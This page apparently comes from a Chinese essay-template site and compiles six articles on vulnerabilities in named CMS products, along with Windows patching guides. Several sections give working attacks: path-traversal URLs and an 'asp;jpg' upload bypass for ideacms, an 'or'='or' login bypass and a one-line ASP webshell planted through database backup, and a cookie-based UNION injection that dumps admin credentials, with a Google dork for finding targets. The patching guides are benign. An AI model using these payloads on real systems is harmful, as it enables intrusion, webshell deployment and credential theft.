当前位置：首页 > 实用文档 > 其他范文> ideacms文章管理系统漏洞及修复

ideacms文章管理系统漏洞及修复

时间：2022-12-21 07:34:14 其他范文收藏本文下载本文

ideacms文章管理系统漏洞及修复（精选7篇）由网友“朋克禅修”投稿提供，以下是小编整理过的ideacms文章管理系统漏洞及修复，希望能够帮助到大家。

ideacms文章管理系统漏洞及修复

篇1：ideacms文章管理系统漏洞及修复

'\admin\admin_upfile.asp

'略

dim folderList,folderNum,i,folderAttr,fileList,fileNum,j,fileAttr,folder,filedir,filename,lastLevelPath

dim dirTemplate : dirTemplate=“../Upload”

dim path : path=getForm(“path”,“get”) : if isNul(path) then path= dirTemplate

if left(path,9)“../Upload” then alert “只允许编辑Upload目录”,“admin_upfile.asp” : die “”

'略

判断问题，

利用方法:

/admin/admin_upfile.asp?path=../Upload/../../

'\admin\admin_template.asp

checkPower

'略

dim folderList,folderNum,i,folderAttr,fileList,fileNum,j,fileAttr,folder,filedir,filename,lastLevelPath

dim dirTemplate : dirTemplate=“../template”

dim path : path=getForm(“path”,“get”) : if isNul(path) then path= dirTemplate

if left(path,11)“../template” then alert “只允许编辑template目录”,“admin_template.asp” : die “”

'略

判断问题。

利用方法:

/admin/admin_template.asp?action=edit&filedir=../template/../robots.txt

shell篇：

'/admin/upload.asp

'略

attachdir=“/”+sitePath+“upload”'上传文件保存路径，结尾不要带/

dirtype=2'1:按天存入目录 2:按月存入目录 3:按扩展名存目录建议使用按天存

maxattachsize=2097152'最大上传大小，默认是2M

upext=“txt,rar,zip,jpg,jpeg,gif,png,swf,wmv,avi,wma,mp3,mid”'上传扩展名

'略

if upfile.isErr=3 then

err=“上传文件扩展名必需为：”+upext

else

err=upfile.ErrMessage

'略

Dim tmpPath

isErr_=0

Set FileStream = CreateObject (“ADODB.Stream”)

oFileStream.Type = 1

oFileStream.Mode = 3

oFileStream.CharSet = “gb2312”

'略

tmpPath=Split(Path,“.”)(0)

FileExt=GetFileExt(Path)

if Over then

if isAllowExt(FileExt) then

oFileStream.SaveToFile tmpPath & “.” & FileExt,2

if Err.number0 then OutErr(“保存文件时出错,请检查路径,是否存在该上传目录!该文件保存路径为” & tmpPath & “.” & FileExt)

Else

isErr_=3

ErrMessage_=“该后缀名的文件不允许上传!”

OutErr(“该后缀名的文件不允许上传”)

End if

Else

'略

Public Function FileData(Item)

isErr_=0

if file.Exists(Item) then

if isAllowExt(File(Item).FileExt) then

'略

Else

isErr_=3

ErrMessage_=“该后缀名的文件不允许上传”

OutErr(“该后缀名的文件不允许上传”)

FileData=“”

End if

else

ErrMessage_=“不存在该对象(如该文件没有上传,文件为空)!”

OutErr(“不存在该对象(如该文件没有上传,文件为空)”)

'略

判断问题：

构造文件名：one.asp;jpg

上传地址：

/admin/editor/upload.htm

其他信息：

默认数据库地址：\date\#A5E371101111.mdb

篇2：正方高校教务管理系统漏洞修复漏洞预警

正方高校教务管理系统是一款学生成绩，选课管理系统，目前有众多高校使用这款教务管理系统，

正方高校教务管理系统漏洞修复漏洞预警

，

近期该系统爆出了一个高危漏洞，攻击者可以利用该漏洞轻易获取网站webshell权限。下面给出漏洞的情况和修复方法:

漏洞类型：上传漏洞

漏洞文件：/ftb.imagegallery.aspx

该漏洞文件没有任何权限限制，访问者可以直接访问该文件，从而通过文件自有的上传功能，来上传构造好的可以解析的后门文件。

漏洞修复：可以设置images目录脚本解析权限为无.有能力的可以针对此文件做好权限身份验证，禁止普通用户访问.

漏洞补丁：请联系正方公司升级网站程序

篇3：小鼻子文章管理系统漏洞漏洞预警

从A5网站上随便下了一个asp的建站系统 “小鼻子文章管理系统”

打开以后发现做的还不错

来到后台/admin/login.asp 默认试了一下万能密码 'or'='or' 发现竟然进去了

来看一下源码

① login.asp文件

Dim errmsg

username=Request(“username”)

password=Request(“password”)

verifycode=Request(“verifycode”)

If username=“” Or password=“” Then

Response.Redirect “login.asp?errno=2”

Response.End

End If

这是一处，发现没有过滤然后是奇怪的竟然在验证码这转化。

If Cstr(Session(“getcode”))Lcase(Cstr(Trim(Request(“verifycode”)))) Then

Response.Redirect “login.asp?errno=0”

Response.End

End If

来看一下防注入文件/inc/AntiAttack.asp分两部分组成

①----- 对 get query 值的过滤.

②-----对 post 表单值的过滤.

对post的代码如下

if request.form“” then

Chk_badword=split(Form_Badword,“‖”)

FOR EACH form_name2 IN Request.Form

for i=0 to ubound(Chk_badword)

If Instr(LCase(request.form(form_name2)),Chk_badword(i))0 Then

Select Case Err_Message

Case “1”

Response.Write “”

Case “2”

Response.Write “”

Case “3”

Response.Write “”

End Select

Response.End

End If

end if

开头“if request.from”

很显然在后台登陆界面的用户和密码处并没有进行判断

所以使用万能密码可以直接登陆后台

二、后台上传shell

我简单的看了一下可以用备份的方法

首先先对网站进行备份后面还原用到

在“网站信息设置”出我们插上闭合型一句话

%><%eval request(“0o1Znz1ow”)%><%

然后备份 xx.asp or xx.cer 等

在 /DataBaseX/文件下会出现我们的马了

篇4：瑞星个人防火墙修复Windows系统漏洞教程

教你如何利用瑞星个人防火墙修复Windows系统漏洞漏洞即某个程序(包括操作系统)在设计时未考虑周全，当程序遇到一个看似合理，但实际无法处理的问题时，引发的不可预见的错误，系统漏洞又称安全缺陷，对用户造成的不良后果。任何事物都非十全十美，作为应用于桌面的操作系统――Windows也是如此，且由于其在桌面操作系统的垄断地位，使其存在的问题会很快暴露。这直接危害到我们使用计算机的安全行为，漏洞受病毒及恶意代码码利用，容易导致巨大损失，有必要把系统漏洞的修复当成前提的任务来做。瑞星个人防火墙则具备这样的功能。本文讲述如何利用瑞星个人防火墙“漏洞扫描”功能扫描并修复 Windows 系统漏洞。

第1步：点击主界面上的“漏洞扫描”标签。

第2步：系统自动扫描您的系统中是否存在安全漏洞，本机上一共发现了62个安全漏洞。请点击 “瑞星漏洞扫描”链接开始我们的漏洞修复工作。

第3步：以下是瑞星漏洞扫描工具的界面，请确认 “安全漏洞”前面的复选框选中。如果您希望漏洞库升级后，重新启动扫描，请把相应的复选框选中。关于“安全设置”功能，请参考瑞星官方帮助文档中的资料。点击“开始扫描”链接进行 Windows 系统漏洞的扫描。

第4步：在这个界面中，将列出您的计算机上所有已知的安全漏洞。请点击“查看详细”链接。

第5步：选中所有漏洞（系统默认就是全选中的），点击 “修复选择的漏洞”链接，

第6步：漏洞扫描工具将尝试从微软下载补丁程序请确保您的计算机能正常的连接互联网。您可以实时看到每个补丁的下载情况。如果漏洞比较多，下载文件会比较多，可能需要等待十几分钟。具体情况因人而异，请耐心等待所有补丁下载完毕。已经下载的补丁默认存放在以下目录：C:Documents and SettingsAdministratorLocalSettingsTempScanBD 请确保您的硬盘有足够的硬盘空间，否则可能会下载失败。

第7步：待所有补丁下载完毕后，该工具将自动安装补丁。补丁安装的过程也会显示在界面中。

个别补丁安装后需要重新启动您的计算机。如下图所示。

请保存您当前的工作，重新启动计算机。

第8步：计算机重启完毕后，再次打开瑞星个人防火墙，点击“漏洞扫描”标签，确认所以漏洞已经修复完毕。

恭喜您！至此为止，您已经成功的修复了操作系统的漏洞。通过对比第2步和第8步，您可以发现未修复前系统存在62个漏洞，修复后安全漏洞个数为0。关于“未修复的安全设置”问题，请查阅瑞星个人防火墙帮助文档。

请注意，微软公司一般在每个月第2周的星期二进行补丁的累计更新，因此建议您：

1.每周至少更新一次瑞星个人防火墙；

2.每月第2周的星期二或者星期三进行一次漏洞扫描。

篇5：Windows安全攻略:教你完全修复系统漏洞

目前互联网上的病毒集团越来越猖狂，对用户的危害也愈演愈烈，大家要懂得保护自己的电脑不受侵犯，隐私不被盗取，记得前段时间一个网友咨询我，抱怨在用360打完补丁后，又安装迅雷软件，这时不厌其烦的提醒你系统还有多少补丁没有打，后来经过研究市面上好多软件都这样例如鲁大师、金山，卡卡等照样会不厌其烦的提醒你系统没有打的补丁。对普通用户而言都晕了，到底打那个，听从那家的软件呢?回忆一下微软的漏洞修补从Windows98就开始了，到了Windows XP及后续的操作系统里，这成为一项默认的安全设置，而且微软还针对桌面端和服务器端的MBSA,SUS,WSUS等软件。

一、什么是Windows系统漏洞

系统漏洞这里是特指您的Windows操作系统在逻辑设计上的缺陷或在编写时产生的错误，这个缺陷或错误可以被不法者或者电脑利用，通过植入木马、病毒等方式来攻击或控制整个电脑，从而窃取您电脑中的重要资料和信息并破坏您的系统。Windows系统漏洞问题是与时间紧密相关的。

一个Windows系统从发布的那一天起，随着用户的深入使用，系统中存在的漏洞会被不断暴露出来，这些早先被发现的漏洞也会不断被系统供应商：微软公司发布的补丁软件修补，或在以后发布的新版系统中得以纠正。

而在新版系统纠正了旧版本中具有漏洞的同时，也会引入一些新的漏洞和错误。例如以前流行过的鼠标>漏洞，就是由于利用了Windows系统对鼠标图标处理的缺陷，木马作者制造畸形图标文件从而溢出，木马就可以在用户毫不知情的情况下执行恶意代码。

二、打补丁是越多越好吗

打补丁是越多越好吗?普通用户会觉得打补丁是越多越好,一口气把所有补丁全打上,以为自己的电脑被找出漏洞攻击的几率就越小,其实不然,我们细细分析一下,以前在没有第三方打补丁软件时候,我们都是用Windows Update来修复系统,那样很少出现问题因为微软已把补丁顺序都已排好了，大家也需会有个疑问，为什么还有顺序呢?因为上一个重要补丁是为下一个补丁作铺垫的，如果打反了，轻则打不上补丁，重则系统出错无法关机、无法开机甚至直接崩溃需要重新安装!就像穿衣服一样，一般都应该先穿内衣，再穿外套，打补丁也一样。而很多第三方打补丁的软件(一些个人做的批量安装补丁程序)并非如此，为了节省时间，几个补丁一起下载，哪个先下载完成打哪个，就像穿衣服的时候拿到外套就先穿外套，然后再把内裤套外边,您电脑的系统可不是“超人”, 这样穿衣服怎么可能不出问题呢?

现在新系统都有UAC(用户帐户控制)，第三方软件权限不可能高于Windows Update，就算一个个修复，会有某个补丁因为权限问题修补不了或者修复不全!补丁程序有两个时间，一个是发布时间，一个是最后更新时间，如果按发布时间为准进行安装，那么显然这个补丁程序就是最新的。

对于重要的补丁需要立即修复，对于功能性更新补丁用于更新系统或软件的功能，比如Office的一些更新补Windows系统安全更新程序Outlook更新补丁，可以暂缓修复。

三、安装补丁后为何要重启计算机

补丁安装过程中由于系统正在运行，文件无法修改，所以要在登录系统之前进行更新。通常情况下Office的补丁直接即可安装，漏洞补丁往往要安装后重启才能生效。

因为系统运行中一些系统必须进程和文件无法被替换,所以需要重启。

四、Windows系统常用漏洞修补工具介绍

1. Windows Update

它是微软提供的一种自动更新工具，通常提供漏洞、驱动、软件的升级。Windows Update是我们用来升级系统的组件，通过它来更新我们的系统，能够扩展系统的功能，让系统支持更多的软、硬件，解决各种兼容性问题，让系统更安全、更稳定。Windows更新比较快每周或每月发布一次。但是，如果出现严重安全威胁(例如影响基于 Windows操作系统的计算机的、广泛传播的病毒)，Microsoft 则会在第一时间发布相应的更新程序。

安全更新支持以下安装开关

. Sus和Wsus

从上面Windows Update的内容，大家可以了解到Windows Update自动更新程序能够方便用户检测和安装修补程序，但它不利于管理员对修补程序进行集中管理，

同时，它还有一个很大的缺陷，在50台机器以上的局域网中，如果管理员用组策略指派了所有的客户机在同一时间内访问Windows Update，以进行检查更新，这个局域网中的代理服务器可能会在此时不堪重负。而SUS就可以非常容易地实现这些Windows Update无法实现的功能。SUS最大的特点就是简单易用。它能够自动地为管理员完成修补程序管理的工作，但不能对Windows 9X等老版本系统提供服务支持。

Wsus功能比起sus更强大它必须与互联网相联才能更新，从微软官方的更新服务器中获得更新数据。然后根据用户的设置下载相关更新包来分发补丁，同时，在内部各机器上还要作好设置，可以通过策略编辑器将客户机的更新指向该服务器IP即可。WSUS下载来更新包与360等软件下载的更新包是不一样的，他也适合中型企业部署补丁使用。出于安全考虑建议将补丁先安装在虚拟机上测试通过后方可使用。

注意事项：

1.Wsus需要您的局域网有企业域环境(AD)。

2.如果您网络边缘部署防火墙请及时打开80、443、445、8530端口，避免出现阻塞问题。

3.如果您在大型企业网中部署有时会出现半天都不更新的情况，如果您部署和配置都没有问题，请耐心等待，有时过一晚上第二天就好了。

3. MBSA

MBSA（下载）可以检查操作系统和 SQL Server 更新。MBSA 还可以扫描计算机上的不安全配置。检查 Windows 服务包和修补程序时，它将 Windows 组件(如 Internet 信息服务 (IIS) 和 COM+)也包括在内您还可以MBSA(目前尚无中文版)工具来检测您的机器是否安全，在防火墙或路由器将两个网络分开的多域环境中(两个单独的Active Directory域)，TCP的139端口和445端口以及UDP的137端口和138端口必须开放，以便MBSA连接和验证所要扫描的远程网络主机。

4. 第三方工具，例如360卫士、金山卫士、鲁大师、卡巴、瑞星等

6. Zoho ManageEngine Security Manager Plus

Security Manager Plus 是一种网路安全扫瞄仪，它可以主动报告网路漏洞，帮助修补漏洞以及确保相容性。由於具有漏洞扫瞄、开放埠检测、修补程序管理和漏洞报告功能，Security Manager Plus 是一款完全可以满足用户保护网路免遭安全威胁和恶意攻击的软体。

红色表示警告有高危风险：

下图生成详细的报告通过以上介绍的这些漏洞修复工具，就能让普通用户轻松修补windows系统的漏洞，保证系统的稳定运行。

(建议：不要在盗版的Window系统中做漏洞修复，那样有可能造成系统故障，甚至是蓝屏或无法启动)

5. GFI LANguard

GFI LANguard Network Security Scanner采用可能使用的各种方式来检查你的网络。通过分析你的系统和在你的网络上执行的程序，它可以帮你找出可能的安全漏洞，这样，你可以在发现之前，来采取有效的行动进行弥补。可以检查整个网络，每个IP，并提供有关信息(是否少装文件，哪个口是打开的，等等)，产生HTML的报告。

篇6：良精企业网站管理系统漏洞

Author:Tr4c3[at]126[dot]com

www.nspcn.org

www.tr4c3.com

涉及版本：良精企业网站管理系统(-V09)官方正式商业版

其他版本未做测试

漏洞文件：

EnProductShow.asp

漏洞描述：

变量ID信任客户端提交值，带入sql语句查询，程序用了通用SQL防注入程序，详细见Check_Sql.asp，关键代码如下

ID=trim(request(“ID”))

if ID=“” then

response.Redirect(“EnProduct.asp”)

end if

sql=“select * from Product where ID=” & ID & “” '此处无过虑，注入点

Set rs= Server.CreateObject(“ADODB.Recordset”)

rs.open sql,conn,1,3

if rs.bof and rs.eof then

response.write“”

else

rs(“Hits”)=rs(“Hits”)+1

rs.update

Check_Sql.asp仅对GET和POST的数据进行了过滤，忽略了Cookie

利用方法：

Google搜索关键字 inurl:“EnProductShow.asp?id=”

cookie注入，支持union，Product表26个字段，演示如下

1.www.Tr4c3.com/EnProductShow.asp?ID=229

2.javascript.:alert(document.cookie=“id=”+escape(“229 union select 0,1,2,3,4,5,6,username,8,password,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from admin”))

3.www.tr4c3.com/EnProductShow.asp

即可union出管理员帐号，密码（md5值）

后台地址

/admin/login.asp

后台拿shell方法很多，

略过